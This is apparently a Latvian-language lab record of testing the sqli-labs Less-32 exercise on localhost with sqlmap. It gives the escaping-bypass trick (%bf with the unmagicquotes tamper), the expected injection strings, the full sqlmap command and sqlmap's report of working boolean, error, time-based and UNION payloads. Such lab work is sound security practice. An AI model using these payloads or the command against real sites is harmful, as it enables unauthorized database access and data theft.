=============================================================================
1. Īpašība: pirms bīstamiem simboliem (šajā gadījumā pirms pēdiņām) ir filtrs, kas ievieto "\", kļūdas gadījumā ziņojums parādās tur pat, kur rezultāts
2. Nepiciešams tampering: jā, --tamper=unmagicquotes
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?id=-1%bf' OR 1=1-- -
3.2. error-based: ?id=-1%bf'
3.3. time-based: ?id=-1%bf' OR SLEEP(1)-- -
3.4. union: ?id=-1%bf' UNION SELECT 1,2,3-- -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 4207611 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-32/?id=1" -p id -risk=3 --level=5 --tamper=unmagicquotes

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 70 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5406=5406-- YaNX

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x71786a7171,(SELECT (ELT(4587=4587,1))),0x717a767871),4587)-- srRD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8880 FROM (SELECT(SLEEP(5)))BNvR)-- IajI

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3518' UNION ALL SELECT NULL,CONCAT(0x71786a7171,0x4946574575545449654b437a58654875784672495156676c546b514a5667677a4c7773757a507a62,0x717a767871),NULL-- -
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
